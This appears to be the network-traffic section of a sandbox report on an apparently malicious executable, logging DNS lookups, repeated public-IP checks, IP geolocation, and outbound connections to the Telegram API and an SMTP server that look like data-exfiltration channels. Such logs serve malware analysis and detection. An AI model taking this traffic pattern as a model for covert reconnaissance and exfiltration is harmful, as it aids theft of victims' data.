                                                                                                                                            Nov 7, 2024 15:19:50.984724045 CET49726443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:50.984749079 CET44349726188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:51.125380993 CET44349726188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:51.125508070 CET44349726188.114.96.3192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:51.125586033 CET49726443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:51.129916906 CET49726443192.168.2.8188.114.96.3
                                                                                                                                            Nov 7, 2024 15:19:51.144066095 CET4972580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:51.149276972 CET8049725193.122.130.0192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:51.149369001 CET4972580192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:51.151355028 CET49727443192.168.2.8149.154.167.220
                                                                                                                                            Nov 7, 2024 15:19:51.151392937 CET44349727149.154.167.220192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:51.151468039 CET49727443192.168.2.8149.154.167.220
                                                                                                                                            Nov 7, 2024 15:19:51.151838064 CET49727443192.168.2.8149.154.167.220
                                                                                                                                            Nov 7, 2024 15:19:51.151850939 CET44349727149.154.167.220192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:52.024200916 CET44349727149.154.167.220192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:52.024350882 CET49727443192.168.2.8149.154.167.220
                                                                                                                                            Nov 7, 2024 15:19:52.028743982 CET49727443192.168.2.8149.154.167.220
                                                                                                                                            Nov 7, 2024 15:19:52.028752089 CET44349727149.154.167.220192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:52.028987885 CET44349727149.154.167.220192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:52.030495882 CET49727443192.168.2.8149.154.167.220
                                                                                                                                            Nov 7, 2024 15:19:52.075333118 CET44349727149.154.167.220192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:52.283456087 CET44349727149.154.167.220192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:52.283519030 CET44349727149.154.167.220192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:52.283608913 CET49727443192.168.2.8149.154.167.220
                                                                                                                                            Nov 7, 2024 15:19:52.284070015 CET49727443192.168.2.8149.154.167.220
                                                                                                                                            Nov 7, 2024 15:19:57.598361015 CET4970980192.168.2.8193.122.130.0
                                                                                                                                            Nov 7, 2024 15:19:57.784296989 CET49728587192.168.2.8208.91.198.143
                                                                                                                                            Nov 7, 2024 15:19:57.789441109 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:57.789531946 CET49728587192.168.2.8208.91.198.143
                                                                                                                                            Nov 7, 2024 15:19:58.450747013 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:58.450997114 CET49728587192.168.2.8208.91.198.143
                                                                                                                                            Nov 7, 2024 15:19:58.456125975 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:58.635401011 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:58.636321068 CET49728587192.168.2.8208.91.198.143
                                                                                                                                            Nov 7, 2024 15:19:58.642487049 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:58.799144983 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:58.799422026 CET49728587192.168.2.8208.91.198.143
                                                                                                                                            Nov 7, 2024 15:19:58.804277897 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:20:00.265482903 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:20:00.265752077 CET49728587192.168.2.8208.91.198.143
                                                                                                                                            Nov 7, 2024 15:20:00.270602942 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:20:00.430349112 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:20:00.430538893 CET49728587192.168.2.8208.91.198.143
                                                                                                                                            Nov 7, 2024 15:20:00.435384035 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:20:00.609477043 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:20:00.612606049 CET49728587192.168.2.8208.91.198.143
                                                                                                                                            Nov 7, 2024 15:20:00.618184090 CET58749728208.91.198.143192.168.2.8
                                                                                                                                            Nov 7, 2024 15:20:00.618232012 CET49728587192.168.2.8208.91.198.143

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 7, 2024 15:19:27.663923025 CET5116853192.168.2.81.1.1.1
                                                                                                                                            Nov 7, 2024 15:19:27.670643091 CET53511681.1.1.1192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:30.542818069 CET5830053192.168.2.81.1.1.1
                                                                                                                                            Nov 7, 2024 15:19:30.549988031 CET53583001.1.1.1192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:51.143961906 CET5348153192.168.2.81.1.1.1
                                                                                                                                            Nov 7, 2024 15:19:51.150883913 CET53534811.1.1.1192.168.2.8
                                                                                                                                            Nov 7, 2024 15:19:57.775363922 CET5858653192.168.2.81.1.1.1
                                                                                                                                            Nov 7, 2024 15:19:57.783660889 CET53585861.1.1.1192.168.2.8

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Nov 7, 2024 15:19:27.663923025 CET192.168.2.81.1.1.10x1f3fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:30.542818069 CET192.168.2.81.1.1.10x2614Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:51.143961906 CET192.168.2.81.1.1.10x324dStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:57.775363922 CET192.168.2.81.1.1.10x4b82Standard query (0)us2.smtp.mailhostbox.comA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Nov 7, 2024 15:19:27.670643091 CET1.1.1.1192.168.2.80x1f3fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:27.670643091 CET1.1.1.1192.168.2.80x1f3fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:27.670643091 CET1.1.1.1192.168.2.80x1f3fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:27.670643091 CET1.1.1.1192.168.2.80x1f3fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:27.670643091 CET1.1.1.1192.168.2.80x1f3fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:27.670643091 CET1.1.1.1192.168.2.80x1f3fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:30.549988031 CET1.1.1.1192.168.2.80x2614No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:30.549988031 CET1.1.1.1192.168.2.80x2614No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:51.150883913 CET1.1.1.1192.168.2.80x324dNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:57.783660889 CET1.1.1.1192.168.2.80x4b82No error (0)us2.smtp.mailhostbox.com208.91.198.143A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:57.783660889 CET1.1.1.1192.168.2.80x4b82No error (0)us2.smtp.mailhostbox.com208.91.199.224A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:57.783660889 CET1.1.1.1192.168.2.80x4b82No error (0)us2.smtp.mailhostbox.com208.91.199.223A (IP address)IN (0x0001)false
                                                                                                                                            Nov 7, 2024 15:19:57.783660889 CET1.1.1.1192.168.2.80x4b82No error (0)us2.smtp.mailhostbox.com208.91.199.225A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • reallyfreegeoip.org
                                                                                                                                            • api.telegram.org
                                                                                                                                            • checkip.dyndns.org

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.849706193.122.130.0803648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 7, 2024 15:19:27.681952953 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 7, 2024 15:19:28.980173111 CET323INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:28 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 106
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: 14951bb2aae8a768ad87a398e6c67e3c
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
                                                                                                                                            Nov 7, 2024 15:19:28.997977018 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Nov 7, 2024 15:19:30.501673937 CET323INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:30 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 106
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: e28b64e7f1671d7c3b8d0bb63a0bc2f3
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>
                                                                                                                                            Nov 7, 2024 15:19:31.482440948 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Nov 7, 2024 15:19:32.888868093 CET323INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:32 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 106
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: 6f79d232cabdaf2bce5692ba4b109279
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.849709193.122.130.0803648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 7, 2024 15:19:33.671489000 CET127OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Nov 7, 2024 15:19:35.745354891 CET323INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:35 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 106
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: 80c4bd6076bf82dba0ed6a412450db19
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            2192.168.2.849711193.122.130.0803648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 7, 2024 15:19:36.548551083 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 7, 2024 15:19:39.220664024 CET730INHTTP/1.1 502 Bad Gateway
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 547
                                                                                                                                            Connection: keep-alive
                                                                                                                                            X-Request-ID: d6b1780790b4a5a283a636adadb84fa6
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED]
                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            3192.168.2.849712193.122.130.0803648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 7, 2024 15:19:39.238316059 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 7, 2024 15:19:41.213118076 CET323INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 106
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: 7af5f2f7e6136f20b640218ba6f3ae87
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            4192.168.2.849715193.122.130.0803648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 7, 2024 15:19:41.967837095 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 7, 2024 15:19:42.795804977 CET323INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 106
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: 4dd1ca9ba849523d38cb906858ab54db
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.849719193.122.130.0803648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 7, 2024 15:19:43.636042118 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 7, 2024 15:19:45.321227074 CET323INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:45 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 106
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: 2d4a96b68db3526437150fd05b6db4ba
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            6192.168.2.849723193.122.130.0803648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 7, 2024 15:19:46.133323908 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 7, 2024 15:19:47.962872028 CET323INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 106
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: 2f6590ec164b857975621b11ec7baa05
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            7192.168.2.849725193.122.130.0803648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Nov 7, 2024 15:19:48.754596949 CET151OUTGET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Nov 7, 2024 15:19:50.383461952 CET323INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:50 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 106
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Request-ID: a51618bda2d5cf52ab5b470efeaf39e0
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.79</body></html>


                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.849707188.114.96.34433648C:\Users\user\Desktop\Lpjrd6Wxad.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-11-07 14:19:31 UTC87OUTGET /xml/173.254.250.79 HTTP/1.1
                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-11-07 14:19:31 UTC1215INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 07 Nov 2024 14:19:31 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 359
                                                                                                                                            Connection: close
                                                                                                                                            x-amzn-requestid: fdd7f0e5-0b37-4438-9eb6-2788ede66d38
                                                                                                                                            x-amzn-trace-id: Root=1-672c4e16-227e3d4c4feb82610b3369a3;Parent=4d4ebb9aaed861d0;Sampled=0;Lineage=1:fc9e8231:0
                                                                                                                                            x-cache: Miss from cloudfront
                                                                                                                                            via: 1.1 e73aa86faa59c17bd459a3caebc0cfc8.cloudfront.net (CloudFront)
                                                                                                                                            x-amz-cf-pop: DFW57-P5
                                                                                                                                            x-amz-cf-id: GuXHxM63mz9dt1GgVIHxkWDSADkIeBsHXzGet2rf2GSNv8Oox5KZ-w==
                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 32349
                                                                                                                                            Last-Modified: Thu, 07 Nov 2024 05:20:22 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n8mkmzcchwljDddkew6Pt9jWjbGYzgCEfq%2F2iZ0I4eenMSDpmw%2BCX05FZeW7klTBJsxZtYC1aLzV7W2qAbt6OoM3rk0zWXxjcEHW2rUFfJHovMeCmbVYcJkEOTyozVoI0yFP9qL5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8dedf570c9c84677-DFW
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1193&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2329847&cwnd=247&unsent_bytes=0&cid=4bf442abf018daeb&ts=279&x=0"
                                                                                                                                            2024-11-07 14:19:31 UTC154INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78
                                                                                                                                            Data Ascii: <Response><IP>173.254.250.79</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Tex
